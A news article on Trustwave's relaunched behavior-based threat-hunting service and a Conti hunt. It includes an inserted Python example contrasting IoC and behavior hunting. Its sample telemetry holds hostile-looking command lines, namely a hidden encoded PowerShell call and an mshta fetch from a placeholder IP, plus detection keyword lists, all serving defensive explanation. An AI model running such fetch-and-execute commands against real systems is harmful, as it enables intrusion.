Cybersecurity vendor Trustwave has announced the relaunch of its Advanced Continual Threat Hunting platform with new, patent-pending human-led threat hunting methodology.
The firm claimed the enhancement will allow its SpiderLabs threat hunting teams to conduct more human-led threat hunts and surface more behavior-based findings of the kind that traditional endpoint detection and response (EDR) tools tend to miss.
New method hunts for behaviors associated with known threat actors
Trustwave stated that its security teams regularly perform advanced threat hunting to study the tactics, techniques, and procedures (TTPs) of sophisticated threat actors.
Trustwave’s new intellectual property (IP) goes beyond indicators of compromise (IoCs) to uncover new or unknown threats by hunting for indicators of behavior (IoBs) associated with specific attackers.
The patent-pending platform uses automation to run MITRE ATT&CK-mapped queries, written for multiple EDR technologies, to hunt at scale for the IoBs of specific threat actors, Trustwave said.
Learnings are then applied to bolster Trustwave’s detection and response capabilities across its managed detection and response (MDR) clients, the vendor stated.
The solution supports most of the popular EDR technologies available, such as Microsoft Defender for Endpoint, Palo Alto Networks Cortex XDR, and SentinelOne, Trustwave added.
Post-relaunch Advanced Continual Threat Hunting benefits listed by Trustwave include:
- Human-led advanced threat hunting conducted at scale with threat actor intelligence
- Discovery of malicious behavior-based activity and hidden or persistent threats
- Continual updates to threat intelligence and detection content after discovering new IoCs
Shawn Kanady, global director, SpiderLabs Threat Hunt Team, tells CSO that a behavior-focused threat hunting approach is critical for modern organizations because it allows them to detect unknown threats that traditional detection, prevention, and EDR tools can’t.
“Automated hunts using tools based on IoCs – for example, IP addresses or a hash of a file – alone are not sufficient to stop sophisticated threat actors who know how to evade detection. Additionally, as IoCs become known, attackers will change their infrastructure (e.g., domains, IPs, malware hashes).”
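To make the IoC-versus-IoB distinction in the passages above concrete, here is an added example that is not Trustwave's platform or code: a small Python hunt over constructed, EDR-style process-creation telemetry. An IoC lookup keyed on a known command-and-control address catches only the campaign it was learned from; a behavior rule that looks for an Office application spawning a scripting host that downloads or decodes a payload (mapped here, as an assumption, to ATT&CK T1566.001 leading to T1059) catches the second campaign even though its infrastructure differs, and its observables can then be fed back into the IoC list. The hosts, addresses, hashes and command lines are all invented for the example.

```python
"""IoC lookup versus indicator-of-behavior (IoB) hunting over constructed
EDR-style process-creation telemetry.

Added example, not Trustwave's code. Hosts, addresses, command lines and the
ATT&CK mapping are illustrative assumptions; only the Windows binary names
and the MITRE technique IDs are real.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str       # parent process image name, as an EDR would report it
    image: str        # child process image name
    cmdline: str
    remote_addr: str  # network destination correlated to the child, "" if none


# Constructed telemetry. ws01 and ws02 show the same behavior (an Office app
# spawning a scripting host that fetches or decodes a payload) but belong to
# two campaigns using different infrastructure. ws03-ws05 are benign noise.
EVENTS = [
    ProcessEvent("ws01", "WINWORD.EXE", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
                 "203.0.113.10"),
    ProcessEvent("ws02", "EXCEL.EXE", "mshta.exe",
                 "mshta.exe http://198.51.100.7/update.hta",
                 "198.51.100.7"),
    ProcessEvent("ws03", "explorer.exe", "powershell.exe",
                 "powershell.exe -Command Get-Date", ""),
    ProcessEvent("ws04", "OUTLOOK.EXE", "explorer.exe",
                 "explorer.exe C:\\Users\\alice\\Downloads", ""),
    ProcessEvent("ws05", "WINWORD.EXE", "cmd.exe",
                 "cmd.exe /c dir", ""),
]

# IoC list as it would look after the first campaign was analysed: the
# attacker only has to move to a new address (or rebuild the payload so the
# hash changes) to fall out of this set.
KNOWN_BAD_IOCS = {"203.0.113.10"}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line fragments that indicate a download or decode-and-execute step
PAYLOAD_HINTS = ("-enc", "-encodedcommand", "downloadstring",
                 "invoke-webrequest", "iwr ", "http://", "https://",
                 "frombase64string")


def hunt_by_ioc(events, known):
    """Classic IoC matching: flag events whose destination is already known bad."""
    return [e for e in events if e.remote_addr in known]


def hunt_by_iob(events):
    """Behavior hunt: Office parent -> scripting host child -> payload fetch or
    decode on the command line. Assumed mapping: T1566.001 (spearphishing
    attachment) leading to T1059 (command and scripting interpreter).
    Independent of any hash, domain or IP."""
    findings = []
    for e in events:
        if e.parent.lower() not in OFFICE_APPS:
            continue
        if e.image.lower() not in SCRIPT_HOSTS:
            continue
        cl = e.cmdline.lower()
        if any(hint in cl for hint in PAYLOAD_HINTS):
            findings.append((e, "T1566.001 -> T1059"))
    return findings


def promote_to_iocs(findings, known):
    """The 'continual update' step: observables from behavior findings become
    new IoCs for the automated layer. Returns only the ones not yet known."""
    return {e.remote_addr for e, _ in findings if e.remote_addr} - known


if __name__ == "__main__":
    print("IoC hits :", [e.host for e in hunt_by_ioc(EVENTS, KNOWN_BAD_IOCS)])
    iob = hunt_by_iob(EVENTS)
    print("IoB hits :", [(e.host, t) for e, t in iob])
    print("New IoCs :", promote_to_iocs(iob, KNOWN_BAD_IOCS))
```

The IoC pass returns only ws01; the behavior pass returns ws01 and ws02 and yields 198.51.100.7 as a new IoC. The rule deliberately requires a payload hint on the command line so that an Office app launching a plain shell (ws05) is not flagged on its own; in a real hunt that threshold, and the parent and child sets, are what the analyst tunes per client and per actor.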
Hunting the Conti ransomware group
Kanady cites an example of a successful threat hunt using the new methodology to track the Conti ransomware gang.
“One incredible finding was a remote access Trojan (RAT) that had resided in a client network for 11 months undetected,” he says. “At this point, one of the true highlights of Advanced Continual Threat Hunting became apparent. While searching for Conti, the team found evidence of other threats and security lapses.”
It is normal for one gang to borrow tricks from another, and these borrowed techniques were now being discovered alongside general security hygiene issues such as unsecured legacy systems, open ports, and people making foolish mistakes like storing passwords on their computers, Kanady adds.
“These issues are now all being found before they cause a breach or security incident. A typical security check would not uncover these problems.” As a result of the new methodology, the SpiderLabs Threat Hunting team has seen a threefold increase in behavior-based threat findings, Kanady claims.